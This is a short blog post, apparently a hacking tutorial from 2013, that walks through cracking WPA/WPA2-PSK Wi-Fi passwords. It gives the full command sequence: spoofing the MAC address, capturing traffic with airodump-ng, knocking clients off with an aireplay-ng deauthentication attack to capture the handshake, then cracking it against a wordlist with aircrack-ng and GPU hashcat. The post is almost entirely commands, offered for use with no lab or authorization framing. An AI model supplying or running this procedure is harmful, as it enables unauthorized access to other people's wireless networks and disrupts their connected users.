==== Warmly welcome to | Knowledge Seeker Tutorials Zone | ====

Search This Blog

Friday, March 22, 2013

WIFI Penetration Tutorial [WPA/WPA2-PSK]

Hacking Wireless (WPA/WPA2) with wordlist



Need:
-station (traffic)
-strong wordlist
-weak password



TERMINAL No.1

airmon-ng




airmon-ng start [interface]




ifconfig [interface] down
macchanger -m 00:11:22:33:44:55 [interface]
ifconfig [mon0] down
macchanger -m 00:11:22:33:44:55 [mon0]
ifconfig [interface] up
ifconfig [mon0] up





airodump-ng [mon0]




airodump-ng --bssid [BSSID] –c [CH] –w [file] mon0




Keep It OPen





TERMINAL No.2


aireplay-ng --deauth 10 –a [BSSID] –c [STATION] [mon0]




We Will Get WPA Handshake After Few Minutes




aircrack-ng [file]-01.cap –w [wordlist]





Password Sucessfully Cracked


For Speed Up Cracking We Will Use HashCat

If you have good graphic card (Nvidia or ATI) use this:

download the latest hashcat-plus form:
http://hashcat.net/oclhashcat-plus/

and extract it on your desktop....

Now upload your handshake (.cap file) to: <--- this you can also do with aircrack-ng (look images)
https://hashcat.net/cap2hccap/

And click convert. Save that file to your desktop too.

Now open hashcat folder and edit example file:

if u have Nvidia graphic card edit: cudaExample0.cmd
if u have ATI graphic card edit: oclExample0.cmd

If u have 32-bit computer change 64 to 32 (look images...)

in the file type (for 64 bit computer and Nvidia card):

cudaHashcat-plus64.exe -m 2500 MyPreconvertedFile.hccap MyWordlist.txt
pause

Save this as: WPA.cmd and run it !

HITS & TIPS:
-make sure you have a latest graphic driver installed


Here The Pic





























0 comments:

Post a Comment